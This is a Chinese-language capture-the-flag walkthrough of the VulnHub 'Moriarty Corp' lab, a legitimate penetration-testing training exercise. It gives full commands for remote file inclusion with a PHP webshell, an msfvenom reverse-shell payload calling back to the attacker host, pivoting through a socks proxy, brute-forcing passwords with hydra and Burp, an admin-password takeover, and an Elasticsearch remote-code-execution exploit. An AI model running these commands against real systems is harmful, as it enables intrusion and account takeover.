攻击机:kali(192.168.1.100)
目标机:Moriarty Corp(192.168.1.105) 内网(172.17.0.0/24)
这里用vmware搭建靶场扫描不到目标,改用VM_VirtualBox即可
网络配置如图:
详细靶场说明请参考:
https://www.vulnhub.com/entry/boredhackerblog-moriarty-corp,456/
靶场下载地址:
Download (Mirror):
https://download.vulnhub.com/boredhackerblog/MoriartyCorp.ova
Download (Torrent):
https://download.vulnhub.com/boredhackerblog/MoriartyCorp.ova.torrent
nmap -sn -PR -T 4 192.168.1.0/24
-sn:只进行主机发现,不进行端口扫描。
-PR:ARP Ping。
arp-scan -I eth0 -l
根据描述,访问8000端口
输入flag{start}开始任务
根据提示,访问目标80端口
点击链接发现可能存在文件包含
存在文件包含漏洞
在攻击机开启apache服务并将测试文件放入/var/www/html下
成功解析目标文件
执行一句话木马
这里在攻击机是.txt 利用文件包含到目标机上解析php代码 因此木马执行在目标机上
https://github.com/D35m0nd142/LFISuite
提示内网环境中存在重要的网站,里面存在要获取的flag信息,并且告知内网范围在172.17.0.3-254段。由此,开始步入后渗透攻击阶段,由于靶场环境主要以linux系统环境为主,故此处后渗透工具在此处可选择metasploit工具
msfvenom生成一个shell上传至目标
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=9999 -f elf > shell.elf
msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.1.100
msf6 exploit(multi/handler) > set lport 9999
msf6 exploit(multi/handler) > run
目标机运行shell.elf
chmod u+x shell.elf
./shell.elf
执行指令添加路由操作
run autoroute -s 172.17.0.0/24 #添加路由
run autoroute -p #查看路由情况
设置代理服务器
meterpreter > bg #会话挂后台
msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > exploit
进行内网探测,配置proxychains,可让本地扫描器,软件流量也走代理
echo "socks5 127.0.0.1 1080" >> /etc/proxychains.conf
proxychains nmap 172.17.0.0/24 -sT -Pn -T4 -p80
-sT 进行Tcp扫描探测
-Pn 禁ping扫描
使用代理浏览器访问目标内网
proxychains firefox 172.17.0.4:80
也可在浏览器配置代理进行访问,配置代理类型选择socks5,本地端口为1080。配置好以后,就能通过代理访问内网web应用
该目标站点可以上传文件,同时需要密码 我们用burpsuite抓取上传数据包进行密码爆破
打开burpsuite后,需要添加代理,这样才能将拦截到的数据正确发送到目标服务器,配置过程如下所示:
将浏览器设置为代理burpsuite8080端口
此时数据包通过burpsuite代理再通过socks代理进入内网
利用burpsuite的Intruder模块爆破得到密码为password
利用密码password上传shell
将蚁剑配置代理,连接上传的shell
不成功多连接几次即可
连接成功找到flag(由于msf代理服务器不稳定 命令需要多执行几次)
根据提示,内网有一个目标开启ssh服务
扫描内网22端口发现172.17.0.6开启ssh服务
proxychains nmap 172.17.0.0/24 -sT -Pn -T4 -p22
将提示的账号和密码(md5碰撞解密后)分别放在user.txt和password.txt
https://www.cnblogs.com/lxfweb/p/13176245.html
proxychains hydra -L user.txt -P password.txt ssh://172.17.0.6
use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 172.17.0.6
rhosts => 172.17.0.6
msf6 auxiliary(scanner/ssh/ssh_login) > set pass_file /var/www/html/password.txt
pass_file => /var/www/html/password.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set user_file /var/www/html/user.txt
userpass_file => /var/www/html/user.txt
msf6 auxiliary(scanner/ssh/ssh_login) > run
成功拿到目标ssh服务账号密码(root:weapons)
将获取到的flag内容进行提交后,Moriarty Corp靶场给出新的提示。如下图所示,提示说存在一个聊天网站,管理员的聊天记录可能存在有价值的信息。并给出服务器开放端口可能在443,8000,8080,8888。
扫描内网443,8000,8080,8888端口
proxychains nmap 172.17.0.0/24 -sT -Pn -T4 -p443,8000,8080,8888
根据提示给出的用户名和口令进行登陆,查看网站具有两个功能,可以查看chats聊天记录,可以更改用户名密码。
尝试抓包,通过更改用户名为管理员,设置口令。
此时如果存在任意用户名口令更改漏洞,此时就可以把管理员登陆密码从新设置。
将username变量设为admin 即可修改管理员密码为123456
将获取到的flag内容进行提交后,Moriarty Corp靶场给出新的提示。如下图所示,文中提到一个web应用Elasticsearch。发现该服务使用端口是9200
proxychains nmap 172.17.0.0/24 -sT -Pn -T4 -p9200
访问web站点 知道给服务版本为1.4.2
用kali自带漏洞版本搜索工具 searchexploit
使用36337.py脚本执行远程代码执行攻击,获取shell权限
searchsploit -p 36337 #显示对应编号漏洞利用的完整路径
proxychains python /usr/share/exploitdb/exploits/linux/remote/36337.py 172.17.0.8
通过Moriarty Corp靶场,学习了内网渗透的基本流程。
主机发现:arp-scan、namp
文件包含:远程代码执行、LFISuite自动化工具
payload反弹:攻击机用msf中的multi/hander模块监听 目标机上传并执行msfvenom生成的木马
添加代理:添加路由后msf中使用server/socks_proxy模块配置代理服务器 并用proxychains使用代理